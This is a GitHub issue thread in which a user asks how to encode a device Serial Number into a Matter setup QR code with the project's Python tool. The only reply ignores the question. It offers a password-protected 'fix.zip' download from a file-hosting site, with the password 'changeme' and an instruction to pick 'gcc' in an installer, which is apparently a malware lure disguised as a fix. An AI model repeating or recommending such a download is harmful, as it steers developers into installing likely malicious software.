### ISSUE TITLE
[Feature] Python Tool for Generating QR Codes Including Serial Number

### ISSUE THREAD

**Issue by jwjung1994** [project-chip/connectedhomeip#35244]
### Feature description

The Python code located in the `src/setup_payload/python` path was incredibly helpful in generating the QR code and manual code. Thank you very much! I was able to add the Serial Number to the QR code using the `--tlvBytes` argument with the chip-tool, but is there any guide for doing this with Python?

### Platform

python, windows

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
